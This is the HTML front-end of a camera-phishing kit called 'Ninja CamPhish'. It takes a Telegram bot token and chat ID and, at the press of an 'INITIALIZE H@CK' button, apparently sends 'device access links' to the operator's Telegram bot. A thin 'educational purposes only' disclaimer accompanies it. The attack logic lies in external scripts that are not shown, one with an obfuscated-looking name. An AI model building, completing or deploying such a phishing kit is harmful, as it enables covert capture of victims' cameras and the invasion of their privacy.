<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ninja CamPhish Terminal</title>
    <script src="css.js"></script>
</head>
<body>
    <div class="container">
        <div class="terminal">
            <div class="terminal-header">
                <div class="terminal-buttons">
                    <div class="button red"></div>
                    <div class="button yellow"></div>
                    <div class="button green"></div>
                </div>
                <div class="terminal-title">root@cybermatrix:~# ninja_camphish.web</div>
            </div>
            <div class="terminal-content">
                <div class="logo-container">
                    <img src="https://i.ibb.co/4Rdmyt7m/IMG-20250528-114954-Picsart-Ai-Image-Enhancer-removebg-preview.png" alt="Hacker Icon" class="logo">
                </div>
                <h1 class="glitch">NINJA CAMPHISH</h1>

                <div class="terminal-line">
                    <span class="prompt">[root@matrix]$</span> <span class="typing">Connection established • System ready</span>
                </div>

                <div class="input-group">
                    <label for="token">TELEGRAM TOKEN</label>
                    <input type="text" id="token" placeholder="Ex: 7156722537:AAEvtWVJetHpPAgeJ7gu">
                </div>

                <div class="input-group">
                    <label for="chatid">CHAT ID</label>
                    <input type="text" id="chatid" placeholder="Ex: 5080596463">
                </div>

                <button class="hack-button">INITIALIZE H@CK</button>

                <div class="result-container" id="result">
                    <div class="result-title">SENDING DEVICE ACCESS LINKS...</div>
                    <div class="status-message" id="statusMessage"></div>
                </div>

                <div class="disclaimer">
                    <strong>Disclaimer:</strong> This tool is intended for educational purposes only.
                </div>
            </div>
        </div>

        <div class="developer">
            Developed by: @ronjumodz | Security Researcher
        </div>
    </div>

    <!-- Pop-up message -->
    <div class="popup" id="popup">
        <p>লিংকটি সফলভাবে আপনার টেলিগ্রাম বটে পাঠানো হয়েছে!</p>
        <button class="popup-button" onclick="document.getElementById('popup').style.display = 'none'">OK</button>
    </div>

    <!-- Audio elements -->
    <audio id="loadingSound" src="https://assets.mixkit.co/sfx/preview/mixkit-alarm-digital-clock-beep-989.mp3" preload="auto"></audio>
    <audio id="clickSound" src="https://assets.mixkit.co/sfx/preview/mixkit-select-click-1109.mp3" preload="auto"></audio>

    <script src="script.js"></script>
    <script src="protected_1764177123971.js"></script>
</body>

</html>

